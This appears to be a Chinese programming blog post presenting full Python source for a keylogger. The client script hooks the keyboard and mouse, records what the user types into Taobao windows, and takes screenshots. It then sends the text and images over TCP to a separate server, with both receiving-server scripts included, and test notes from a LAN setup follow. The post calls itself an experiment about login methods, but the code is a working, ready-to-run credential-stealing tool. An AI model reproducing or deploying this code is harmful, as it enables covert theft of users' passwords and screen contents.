Python:通过远程监控用户输入来获取淘宝账号和密码的实验
从今天早上产生了写个获取淘宝账号及密码的想法后,到现在,全天都在看书、调试程序,12小时内写了三篇相关博客,如下:
《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性》
《Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)》
《Python:通过远程监控用户输入来获取淘宝账号和密码的实验(一)》
刚刚把写完了最后一个功能,将用户机器上的抓的图片传送到监控者的服务器上,加之前面实现的各功能,完整程序代码如下:
一、代码:
1、接收消息服务端(hook_server.py)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
def hook_tcp_server():
"""
Function:接收远程机器上发送过来的信息并输入出到终端
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34586
buf_size = 1024
addr =(host, port)
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.bind(addr)
tcp_server_socket.listen(5)
print "waiting for connectiong..."
while True:
tcp_client_socket, addr = tcp_server_socket.accept()
print "connected from :", addr
while True:
msg = tcp_client_socket.recv(buf_size)
print msg
if not msg:
break
tcp_client_socket.close()
tcp_server_socket.close()
if __name__ == "__main__":
hook_tcp_server()
2、接收图片的服务器端(hook_pic_server.py)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import struct
import time
def hook_pic_file_server():
"""
Function:接收远程机器上发送过来的图片并保存到本地
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34587
buf_size = 1024
addr =(host, port)
pic_file_size_info = struct.calcsize("128s32sI8s")
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.bind(addr)
tcp_server_socket.listen(5)
print "waiting for connectiong..."
while True:
tcp_client_socket, addr = tcp_server_socket.accept()
print "connected from :", addr
pic_file_head = tcp_client_socket.recv(pic_file_size_info)
#接收文件头信息
pic_file_name, temp1, pic_file_size, temp2 = struct.unpack("128s32sI8s", pic_file_head)
local_pic_dir = pic_file_name.strip("�")
#接收文件内容
pic_fobj = open(local_pic_dir, "wb")
temp_file_size = pic_file_size
while True:
if temp_file_size > buf_size:
pic_file_data = tcp_client_socket.recv(buf_size)
else:
pic_file_data = tcp_client_socket.recv(temp_file_size)
if pic_file_data:
pic_fobj.write(pic_file_data)
temp_file_size -= len(pic_file_data)
if temp_file_size == 0:
break
pic_fobj.close()
print time.strftime("[%Y-%m-%d %H:%M:%S]: ",time.localtime(time.time()))+ local_pic_dir + " was received"
tcp_client_socket.close()
tcp_server_socket.close()
if __name__ == "__main__":
hook_pic_file_server()
3、客户端(hook_client.py)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pythoncom
import pyHook
import time
from PIL import ImageGrab
import socket
import struct
import os
def send_msg_to_remote(msg):
"""
Function:向远程服务器发送信息
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34586
buf_size = 1024
addr =(host, port)
if len(msg) != 0:
tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
tcp_client_sock.connect(addr)
except IOError, e:
print ("Error:%s" % e.args[0])
tcp_client_sock.close()
data = time.strftime("[%Y-%m-%d %H:%M:%S]",time.localtime(time.time()))
tip_info = data + "from " + socket.gethostname() + ":"
tcp_client_sock.sendall(tip_info + msg)
tcp_client_sock.close()
def send_pic_file_to_remote(pic_file_name):
"""
Function:向远程服务器发送图片
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34587
buf_size = 1024
addr =(host, port)
pic_file_size = struct.calcsize("128s32sI8s")
pic_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
pic_client_socket.connect(addr)
except IOError, e:
print ("Error:%s" % e.args[0])
pic_client_socket.close()
pic_file_head = struct.pack("128s11I", pic_file_name, 0, 0, 0, 0, 0, 0, 0, 0, os.stat(pic_file_name).st_size, 0, 0)
#发送文件信息
pic_client_socket.send(pic_file_head)
#发送文件内容
pic_fobj = open(pic_file_name, "rb")
while True:
file_data = pic_fobj.read(buf_size)
if not file_data:
break
pic_client_socket.send(file_data)
pic_fobj.close()
pic_client_socket.close()
def onMouseEvent(event):
"""
Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,
将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码
框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,
所以此处要判断是否通过鼠标切换了输入窗口
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
global MSG
if len(MSG) != 0:
#屏幕抓图实现
pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
pic = ImageGrab.grab()
pic_file_name = "%s.png" % pic_name
pic.save(pic_file_name)
#向服务器发送文字
send_msg_to_remote(MSG)
MSG = ""
#向服务器发送图片
send_pic_file_to_remote(pic_file_name)
#删除本地保存的图片
os.remove(pic_file_name)
return True
def onKeyboardEvent(event):
"处理键盘事件"
"""
Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入
因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见
的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来
结束输入,此时要将信息发送给远程服务器。
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
global MSG
if event.WindowName.decode("GBK").find(u"淘宝") != -1:
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
if (event.Ascii == 9) or (event.Ascii == 13):
#屏幕抓图实现
pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
pic = ImageGrab.grab()
pic_file_name = "%s.png" % pic_name
pic.save(pic_file_name)
#向服务器发送文字
send_msg_to_remote(MSG)
MSG = ""
#向服务器发送图片
send_pic_file_to_remote(pic_file_name)
#删除本地保存的图片
os.remove(pic_file_name)
return True
if __name__ == "__main__":
"""
Function:获取TAOBAO账号及密码,增加抓图功能
Input:NONE
Output: NONE
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
MSG = ""
#创建hook句柄
hm = pyHook.HookManager()
#监控鼠标
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
#监控键盘
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
二、测试:
1、环境信息:
服务端:
消息接收脚本hook_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34586)
图片接收脚本hook_pic_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34587)
客户端:
脚本hook_client.py运行于Windows xp上(主机名:winxp-duanyx)
2.、实测:
a、 用户在淘宝上操作之后,查看服务器端shell窗口,有如下信息打印,见下图:
b、查看收到的图片文件:
c、查看linux上收到的文件图片:
